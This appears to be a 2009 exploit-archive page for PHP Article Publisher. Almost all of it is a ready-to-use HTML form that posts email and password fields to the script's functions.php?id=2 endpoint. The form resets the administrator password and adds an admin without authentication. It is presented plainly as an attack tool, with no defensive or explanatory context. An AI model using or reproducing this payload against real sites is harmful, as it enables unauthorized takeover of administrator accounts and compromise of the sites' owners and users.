[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : PHP Article Publisher Remote Change Admin Password Exploit
# Published : 2009-05-18
# Author : ahmadbady
# Previous Title : DGNews 3.0 Beta (id) Remote SQL Injection Vulnerability
# Next Title : Joomla Component ArtForms 2.1 b7 Remote File Inclusion Vulnerabilities


=-=-remote change password and add admin xpl-=-=

-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=
script:php_article_publisher
-------------------------------------------------
Author: ahmadbady
my site :Coming Soon
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
download from:http://www.graugon.com/publisher/download.html
--------------------------------------------------
--------------------------

change pass and add admin:


<form method='post' action='functions.php?id=2'>
<font class='font1'><b>coded by ahmadbady:</b></font>
<br><br>
<table width='100%' align='center' valign='top' cellpadding='0' cellspacing='2' border='0'>
<tr>
<td cellpadding='0' cellspacing='0'>
<font class='font1'>Directory Title</font>
</td>
<td cellpadding='0' cellspacing='0'>
<input type='text' size='22' name='title' value='PHP Article Publisher' class='edit'>
</td>
</tr>
<tr>
<td cellpadding='0' cellspacing='0'></td>
<td cellpadding='0' cellspacing='0'><br></td>
</tr>
<tr>
<td cellpadding='0' cellspacing='0'><font class='font1'><b>Login Details</b></font></td>
<td cellpadding='0' cellspacing='0'><br></td>
</tr>
<tr>
<td cellpadding='0' cellspacing='0'></td>
<td cellpadding='0' cellspacing='0'><br></td>
</tr>
<tr>
<td cellpadding='0' cellspacing='0'>
<font class='font1'>Email</font>
</td>
<td cellpadding='0' cellspacing='0'>
<input type='text' size='22' name='email' value='' class='edit'>
</td>
</tr>
<tr>
<td cellpadding='0' cellspacing='0'></td>
<td cellpadding='0' cellspacing='0'><br></td>
</tr>
<tr>
<td cellpadding='0' cellspacing='0'>
<font class='font1'>Password</font>
</td>
<td cellpadding='0' cellspacing='0'>
<input type='text' size='22' name='password' value='111' class='edit'>
</td>
</tr>
<tr>
<td cellpadding='0' cellspacing='0'></td>
<td cellpadding='0' cellspacing='0'><br></td>
</tr>
<tr>
<td cellpadding='0' cellspacing='0'></td>
<td cellpadding='0' cellspacing='0'>
<input type='submit' value='Save Settings' class='submit'>
</td>
</tr>
</table>
</form>								

# www.Syue.com [2009-05-18]